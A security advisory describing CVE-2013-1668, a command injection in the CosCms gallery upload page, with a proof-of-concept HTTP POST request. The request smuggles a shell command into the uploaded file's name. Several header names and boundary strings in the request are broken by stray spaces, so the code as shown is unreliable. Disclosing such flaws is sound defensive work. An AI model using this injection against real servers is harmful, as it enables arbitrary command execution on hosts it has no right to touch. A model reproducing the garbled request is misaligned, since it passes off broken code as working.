OS Command Injection in CosCms

High-Tech Bridge Security Research Lab discovered vulnerability in CosCms, which can be exploited to execute arbitrary OS commands on web server where the vulnerable application is hosted.

1. OS Command Injection in CosCms: CVE-2013-1668
   Vulnerability exists due to insufficient validation of user-supplied input in “$_FILES[‘file’][‘name’]” variable passed to “/gallery/upload/index” URL before using it in PHP “exec()” function. A remote attacker can send a specially crafted HTTP POST request containing a malicious filename, and execute arbitrary commands on the target system with privileges of the web server.
   The following PoC (Proof of Concept) code will write output of “ls -la” command into “/gallery/upload/file.txt” file. You can use any tool to send raw HTTP requests, e.g. telnet:

POST /gallery/upload/index HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------21456260222104
Content-Length: 970
-----------------------------21456260222104
Content-Disposition: form-data; name=“title”
1
-----------------------------21456260222104
Content-Disp osition: form-data; name=“image_add”
1
-----------------------------21456260222104
Content- Disposition: form-data; name=“description”
1
-----------------------------21456260222104
Conten t-Disposition: form-data; name=“tags”

-----------------------------21456260222104
Content-Dispos ition: form-data; name=“MAX_FILE_SIZE”
100000000
-----------------------------214562602221 04
Content-Disposition: form-data; name=“APC_UPLOAD_PROGRESS”
511ad0922b50f
-----------------------------21 456260222104
Content-Disposition: form-data; name=“file”; filename=“1 & ls -la > file.txt”
Content-Type: application/octet-stream
1
-----------------------------21456260222104
Content-Disposition: form-data; name=“submit”
Update
-----------------------------21456260222104–

Successful exploitation of this vulnerability requires an attacker to be logged-in and have privileges to upload files. User registration is disabled by default.